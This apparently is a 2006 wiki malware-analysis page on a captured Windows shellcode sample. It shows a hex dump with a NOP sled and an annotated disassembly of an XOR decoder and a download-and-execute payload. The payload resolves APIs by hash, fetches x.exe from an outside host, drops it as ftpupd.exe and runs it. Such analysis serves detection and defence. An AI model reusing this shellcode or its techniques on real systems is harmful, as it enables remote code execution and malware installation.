00000610: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000620: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000630: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000640: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000650: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000660: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000670: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000680: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000690: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000700: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000710: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000720: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000730: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000740: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000750: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000760: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000770: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000780: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000790: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000800: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000810: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000820: 90 90 90 90 90 90 90 90 - 00 46 00 01 90 90 90 90   ........ .F......
00000830: 90 90 90 90 90 90 90 90 - 66 81 ec 1c 07 ff e4 90   ........ f.......
00000840: 90 90 90 90 90 90 90 90 - 90 90 90 90 95 14 40 00   ........ ........
00000850: 03 00 00 00 7c 70 40 00 - 01 00 00 00 00 00 00 00   .....p.. ........
00000860: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00   ........ ........
00000870: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00   ........ ........
00000880: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00   ........ ........
00000890: 01 00 00 00 00 00 00 00 - 7c 70 40 00 01 00 00 00   ........ .p......
000008a0: 00 00 00 00 01 00 00 00 - 00 00 00 00 7c 70 40 00   ........ .....p..
000008b0: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00   ........ ........
000008c0: 7c 70 40 00 01 00 00 00 - 00 00 00 00 01 00 00 00   .p...... ........
000008d0: 00 00 00 00 78 85 13 00 - ab 5b a6 e9 31 31 31 31   ....x... ....1111
000008e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000008f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000900: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000910: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000920: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000930: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000940: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000950: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000960: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000970: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000980: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000990: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009a0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009b0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009c0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009d0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000aa0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ab0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ac0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ad0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ae0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000af0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ba0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000bb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000bc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000bd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000be0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000bf0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ca0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000cb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000cc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000cd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ce0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000cf0: 31 31 31 31 31 31 31 00 - 00                        1111111. .

Analysis

XOR decoder "geithain xor"

0000015F loc_15F:                                ; reached via the CALL at 0x180: the pushed return address becomes the base register
0000015F                 pop     ebp             ; ebp = 0x185 (byte after the 5-byte CALL); all data references later are ebp-relative
00000160                 xor     ecx, ecx
00000162                 mov     cx, 1F1h        ; ecx = 0x1F1 = 497 output bytes; LOOP counts one iteration per byte written
00000166
00000166 loc_166:
00000166                 lea     esi, [ebp+5]    ; esi = read pointer = 0x18A (loc_18A), first byte of the encoded payload
00000169                 mov     edi, esi        ; edi = write pointer; decoding happens in place (edi never overtakes esi)
0000016B
0000016B loc_16B:
0000016B                 mov     al, [esi]       ; fetch next encoded byte
0000016D
0000016D loc_16D:
0000016D                 cmp     al, 99h ; 0x99 (IDA shows CP437 'Ö') doubles as an escape marker inside the encoded stream
0000016F                 jnz     short loc_176   ; plain byte: decode directly
00000171                 inc     esi             ; escaped byte: skip the marker ...
00000172                 mov     al, [esi]       ; ... take the byte after it ...
00000174                 sub     al, 30h ; '0'   ; ... and undo the +0x30 offset the encoder presumably applied to it
00000176
00000176 loc_176:
00000176                 inc     esi
00000177                 xor     al, 99h         ; XOR key 0x99; a raw 0x99 would decode to 0x00, which is why that value is escaped above
00000179                 mov     [edi], al       ; overwrite the encoded byte with its decoded value
0000017B                 inc     edi
0000017C                 loop    loc_16B         ; until 0x1F1 bytes have been written
0000017E                 jmp     short loc_18A   ; jump into the freshly decoded code (signature-relevant: constant key, count and escape byte)
00000180 ; ---------------------------------------------------------------------------
00000180                 call    loc_15F         ; intended entry point of the decoder: CALL/POP "GetPC" to obtain ebp

Decoded (un-XORed) shellcode

0000011E aHttrrrrrrrrrrp192_ db 'httÉÉÉÉÉÉÉÉÉÉp://192.168.0.1:974/x.exe',0 ; the ten 'É' are the CP437 rendering of 0x90 (NOP) filler bytes inside the URL
00000145                 db 0DFh ; ¯             ; URL is broken: [ebp-5Dh] = 0x128 points at the filler, three bytes before 'p', so "htt" is never part of the string handed to wininet
00000146                 db 0DFh ; ¯             ; 0xDF is the terminator/padding byte used by the pre-decoder data; sub_2AC rewrites the first one it finds to NUL
00000147                 db 0DFh ; ¯
00000148                 db 0DFh ; ¯
00000149                 db 0DFh ; ¯
0000014A                 db 0DFh ; ¯
0000014B                 db 0DFh ; ¯
0000014C                 db 0DFh ; ¯
0000014D                 db 0DFh ; ¯
0000014E                 db 0DFh ; ¯
0000014F                 db 0DFh ; ¯
00000150                 db 0DFh ; ¯
00000151                 db 0DFh ; ¯
00000152                 db 0DFh ; ¯
00000153 aMozilla4_0     db 'Mozilla/4.0',0      ; user-agent string for InternetOpenA, referenced as [ebp-32h] (0x185 - 0x32 = 0x153)

0000018A loc_18A:                                ; first decoded instruction; also the restart point used by the exception handler below
0000018A                 call    loc_199         ; pushes 0x18F; loc_199 turns that return address into an SEH handler pointer
0000018F                 mov     esp, [esp+8]    ; handler entry (0x18F): 2nd handler argument = EXCEPTION_REGISTRATION record -> esp
00000193                 pop     dword ptr fs:[eax] ; restore the previous record; looks like it relies on eax == 0 at handler entry -- TODO confirm
00000196                 pop     eax             ; discard the handler address (0x18F)
00000197                 jmp     short loc_18A   ; any exception in the payload re-installs the frame and retries everything from the top
00000199 ; ---------------------------------------------------------------------------
00000199
00000199 loc_199:
00000199                 xor     ebx, ebx
0000019B                 push    dword ptr fs:[ebx] ; push current head of the SEH chain (fs:[0]) ...
0000019E                 mov     fs:[ebx], esp   ; ... so {prev, handler = 0x18F} on the stack becomes the new head
000001A1                 lea     eax, [ebp+130h] ; "u13.2i" (aU13_2i at 0x2B5 = 0x185 + 0x130)
000001A7                 push    eax             ; lpName
000001A8                 push    1               ; bInheritHandle
000001AA                 push    1F0001h         ; dwDesiredAccess = MUTEX_ALL_ACCESS
000001AF                 call    CallProcKernel32 ; the DWORD following each of these CALLs is the API-name hash consumed by the stub
000001AF ; ---------------------------------------------------------------------------
000001B4                 dd 0AE52C609h           ; OpenMutexA
000001B8 ; ---------------------------------------------------------------------------
000001B8                 or      eax, eax
000001BA                 jnz     loc_2A1         ; mutex already exists -> ExitThread; presumably an "already running" marker (no CreateMutex is visible in this listing)
000001C0                 lea     edi, [ebp-32h]  ; 0x153 = aMozilla4_0
000001C3                 call    sub_2AC         ; remove DF byte after string at edi (NUL-terminates it in place)
000001C8                 lea     edi, [ebp-5Dh]  ; 0x128 = inside the URL string, on the 0x90 filler -- the broken URL noted above
000001CB                 call    sub_2AC
000001D0                 push    4               ; flProtect = PAGE_READWRITE
000001D2                 push    1000h           ; flAllocationType = MEM_COMMIT
000001D7                 push    50000h          ; dwSize = 0x50000 (also the single-read size used below)
000001DC                 push    0               ; lpAddress = NULL
000001DE                 call    CallProcKernel32
000001DE ; ---------------------------------------------------------------------------
000001E3                 dd 697A6AFEh            ; VirtualAlloc
000001E7 ; ---------------------------------------------------------------------------
000001E7                 mov     [ebp+148h], eax ; pointer to reserved memory, stored at 0x2CD (zero padding after the file name)
000001ED                 sub     eax, eax
000001EF                 push    eax             ; hTemplateFile = NULL
000001F0                 push    eax             ; dwFlagsAndAttributes = 0
000001F1                 push    2               ; dwCreationDisposition = CREATE_ALWAYS
000001F3                 push    eax             ; lpSecurityAttributes = NULL
000001F4                 push    eax             ; dwShareMode = 0
000001F5                 push    40000000h       ; dwDesiredAccess = GENERIC_WRITE
000001FA                 lea     ebx, [ebp+13Bh] ; .\ftpupd.exe (0x2C0)
00000200                 push    ebx             ; lpFileName
00000201                 call    CallProcKernel32
00000201 ; ---------------------------------------------------------------------------
00000206                 dd 8F8F114h             ; CreateFileA
0000020A ; ---------------------------------------------------------------------------
0000020A                 mov     [ebp+137h], eax ; file handle, stored at 0x2BC (zero padding after the mutex name)
00000210                 cmp     eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE
00000213                 jz      loc_2A1
00000219                 sub     ecx, ecx
0000021B                 push    ecx             ; dwFlags = 0
0000021C                 push    ecx             ; lpszProxyBypass = NULL
0000021D                 push    ecx             ; lpszProxy = NULL
0000021E                 push    1               ; dwAccessType = INTERNET_OPEN_TYPE_DIRECT
00000220                 lea     eax, [ebp-32h]  ; "Mozilla/4.0"
00000223                 push    eax             ; lpszAgent
00000224                 call    CallProcWininet
00000224 ; ---------------------------------------------------------------------------
00000229                 dd 8593DD7h             ; InternetOpenA
0000022D ; ---------------------------------------------------------------------------
0000022D                 mov     edx, eax        ; edx = hInternet (kept live across the next pushes)
0000022F                 or      eax, eax
00000231                 jz      short loc_2A1
00000233                 sub     eax, eax
00000235                 push    eax             ; dwContext = 0
00000236                 push    eax             ; dwFlags = 0
00000237                 push    eax             ; dwHeadersLength = 0
00000238                 push    eax             ; lpszHeaders = NULL
00000239                 lea     ebx, [ebp-5Dh]  ; 0x128: the URL minus its "htt" prefix
0000023C                 push    ebx             ; lpszUrl
0000023D                 push    edx             ; hInternet
0000023E                 call    CallProcWininet
0000023E ; ---------------------------------------------------------------------------
00000243                 dd 0B87DBD66h           ; InternetOpenURLA
00000247 ; ---------------------------------------------------------------------------
00000247                 or      eax, eax
00000249                 jz      short loc_2A1
0000024B                 push    esp             ; stack slot that receives lpdwNumberOfBytesRead
0000024C                 push    esp             ; pointer to that slot
0000024D                 push    50000h          ; dwNumberOfBytesToRead = 0x50000
00000252                 push    dword ptr [ebp+148h] ; lpBuffer = VirtualAlloc'd block
00000258                 push    eax             ; hFile from InternetOpenUrlA
00000259                 call    CallProcWininet
00000259 ; ---------------------------------------------------------------------------
0000025E                 dd 1A212962h            ; InternetReadFile (called exactly once: only what this single read returns is written out)
00000262 ; ---------------------------------------------------------------------------
00000262                 pop     edx             ; edx = bytes read
00000263                 push    esp             ; slot for lpNumberOfBytesWritten
00000264                 mov     eax, esp        ; eax = address of that slot
00000266                 push    0               ; lpOverlapped = NULL
00000268                 push    eax             ; lpNumberOfBytesWritten
00000269                 push    edx             ; nNumberOfBytesToWrite = bytes read
0000026A                 push    dword ptr [ebp+148h] ; lpBuffer
00000270                 push    dword ptr [ebp+137h] ; hFile = the CreateFileA handle
00000276                 call    CallProcKernel32
00000276 ; ---------------------------------------------------------------------------
0000027B                 dd 0F3FD1C3h            ; WriteFile
0000027F ; ---------------------------------------------------------------------------
0000027F                 pop     ecx             ; discard the bytes-written slot
00000280                 push    dword ptr [ebp+137h]
00000286                 call    CallProcKernel32
00000286 ; ---------------------------------------------------------------------------
0000028B                 dd 723EB0D5h            ; CloseHandle (the wininet handles are never closed)
0000028F ; ---------------------------------------------------------------------------
0000028F                 push    5               ; uCmdShow = SW_SHOW
00000291                 lea     ebx, [ebp+13Bh] ; .\ftpupd.exe
00000297                 push    ebx             ; lpCmdLine
00000298                 call    CallProcKernel32
00000298 ; ---------------------------------------------------------------------------
0000029D                 dd 0E8BF6DADh           ; WinExec
000002A1 ; ---------------------------------------------------------------------------
000002A1
000002A1 loc_2A1:                                ; common exit for success and every failed API check above
000002A1                 push    0               ; dwExitCode
000002A3                 call    CallProcKernel32
000002A3 ; ---------------------------------------------------------------------------
000002A8                 dd 768AA260h            ; ExitThread
000002AC
000002AC ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
000002AC
000002AC
000002AC sub_2AC         proc near               ; NUL-terminate the string at edi: pre-decoder strings end in 0xDF instead of 0x00
000002AC                 mov     al, 0DFh ; '¯'  ; byte to search for
000002AE                 repne scasb             ; ecx is NOT initialised here; the scan limit is whatever the preceding API call left in ecx (if 0, nothing is scanned at all)
000002B0                 mov     byte ptr [edi-1], 0 ; edi has advanced past the match: overwrite the 0xDF (or, with ecx == 0, the byte before the string) with NUL
000002B4                 retn
000002B4 sub_2AC         endp
000002B4
000002B4 ; ---------------------------------------------------------------------------
000002B5 aU13_2i         db 'u13.2i',0           ; mutex name for OpenMutexA ([ebp+130h])
000002BC                 db    0                 ; [ebp+137h] = 0x2BC: these four bytes are reused at runtime to hold the CreateFileA handle
000002BD                 db    0
000002BE                 db    0
000002BF                 db    0
000002C0 a_Ftpupd_exe    db '.\ftpupd.exe',0     ; drop path for CreateFileA and WinExec ([ebp+13Bh])
000002CD                 db    0                 ; [ebp+148h] = 0x2CD: runtime slot for the VirtualAlloc buffer pointer
000002CE                 db    0
000002CF                 db    0
000002D0                 db    0
000002D1                 db    0                 ; [ebp+14Ch] = 0x2D1: CallProcKernel32 stores the last resolved API address here
000002D2                 db    0
000002D3                 db    0
000002D4                 db    0
000002D5                 db    0
000002D6                 db    0
000002D7                 db    0
000002D8                 db    0
000002D9 aSleep          db 'Sleep',0            ; not referenced anywhere in the visible listing
000002DF aKernel32       db 'kernel32',0         ; not referenced anywhere in the visible listing
000002E8
000002E8 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
000002E8
000002E8
000002E8 CallProcWininet proc near               ; resolve and call a wininet export; the DWORD after the CALL is the name hash
000002E8                 pop     esi             ; esi = return address = address of the hash DWORD
000002E9                 lodsd                   ; eax = hash; esi now points past it (the eventual return target)
000002EA                 pusha                   ; the saved eax at [esp+1Ch] is what loc_32F compares against
000002EB                 xor     eax, eax
000002ED                 sub     eax, 0FFB3B3BCh ; = 4C4C44 -> "LLD" (in memory "DLL\0"); the library name is built on the stack, no literal string in the code
000002F2                 push    eax
000002F3                 xor     eax, 2E18090Ah  ; = 2E54454E -> .TEN (in memory "NET.")
000002F8                 push    eax
000002F9
000002F9 loc_2F9:                                ; = 494E4957 -> INIW (in memory "WINI") -> stack now reads "WININET.DLL"
000002F9                 add     eax, 1AFA0409h
000002FE                 push    eax
000002FF                 push    esp             ; lpLibFileName = pointer to the assembled name
00000300                 call    CallProcKernel32
00000300 ; ---------------------------------------------------------------------------
00000305                 dd 0C8AC8026h           ; LoadLibrary -> eax = module base of wininet
00000309 ; ---------------------------------------------------------------------------
00000309                 lea     esp, [esp+0Ch]  ; drop the three name DWORDs without touching flags
0000030D                 xchg    eax, ebx        ; export walker below expects the module base in ebx
0000030E                 jmp     short loc_318   ; reuse CallProcKernel32's export lookup, entered after its getKernel32Base call
0000030E CallProcWininet endp
0000030E
00000310
00000310 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
00000310
00000310
00000310 CallProcKernel32 proc near              ; resolve a kernel32 export by name hash and call it; hash DWORD follows the CALL
00000310                 pop     esi             ; esi = address of the hash DWORD
00000311                 lodsd                   ; eax = hash; esi = return target after the hash
00000312                 pusha                   ; saved eax lands at [esp+1Ch]
00000313                 call    getKernel32Base ; ebx = kernel32 image base
00000318
00000318 loc_318:                                ; shared entry (also used by CallProcWininet): ebx = module base, [esp+1Ch] = wanted hash
00000318                 mov     ecx, [ebx+3Ch]  ; e_lfanew
0000031B                 mov     ecx, [ecx+ebx+78h] ; DataDirectory[0] RVA = export directory
0000031F                 add     ecx, ebx        ; ecx = IMAGE_EXPORT_DIRECTORY
00000321                 xor     esi, esi        ; esi = name index
00000323
00000323 loc_323:
00000323                 lea     edx, [ebx+esi*4]
00000326                 add     edx, [ecx+20h]  ; AddressOfNames
00000329                 mov     edx, [edx]
0000032B                 add     edx, ebx        ; edx = exported name string
0000032D                 xor     eax, eax
0000032F
0000032F loc_32F:                                ; hash = for each char: rol 7, xor low byte (stable signature material together with the constants above)
0000032F                 rol     eax, 7
00000332                 xor     al, [edx]
00000334                 inc     edx
00000335                 cmp     byte ptr [edx], 0 ; stop when the next byte is the terminator
00000338                 jnz     short loc_32F
0000033A                 cmp     eax, [esp+1Ch]  ; compare with the requested hash
0000033E                 jz      short loc_347
00000340                 inc     esi
00000341                 cmp     esi, [ecx+18h]  ; NumberOfNames
00000344                 jb      short loc_323
00000346                 int     3               ; Trap to Debugger: no fallback if the hash is not found
00000347
00000347 loc_347:
00000347                 mov     edx, [ecx+24h]  ; AddressOfNameOrdinals
0000034A                 add     edx, ebx
0000034C                 movzx   edx, word ptr [edx+esi*2] ; ordinal for the matched name
00000350                 mov     eax, [ecx+1Ch]  ; AddressOfFunctions
00000353                 add     eax, ebx
00000355                 mov     eax, [eax+edx*4]
00000358                 add     eax, ebx        ; eax = resolved function address
0000035A                 mov     [esp+1Ch], eax  ; overwrite saved eax so POPA returns the address in eax
0000035E                 popa
0000035F                 mov     [ebp+14Ch], eax ; cache the address at 0x2D1 (not read back anywhere in this listing)
00000365                 call    eax             ; stdcall: the callee removes the arguments pushed by the caller
00000367                 jmp     esi             ; resume after the hash DWORD
00000367 CallProcKernel32 endp
00000367
00000369
00000369 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
00000369
00000369
00000369 getKernel32Base proc near               ; ebx = image base of the second module in the loader's initialization-order list
00000369                 mov     ebx, fs:30h     ; PEB
0000036F                 mov     ebx, [ebx+0Ch]  ; PEB->Ldr
00000372                 mov     ebx, [ebx+1Ch]  ; Ldr->InInitializationOrderModuleList.Flink (first entry)
00000375                 mov     ebx, [ebx]      ; second entry
00000377                 mov     ebx, [ebx+8]    ; DllBase of that entry; NOTE(review): assumes kernel32 sits in that slot, which holds for the Windows versions of this sample's era but not for later ones
0000037A                 retn
0000037A getKernel32Base endp

shellcode patterns

xor


bindshell

 
 
csni/shellcodes/geithain.txt · Last modified: 2006/02/17 14:01
 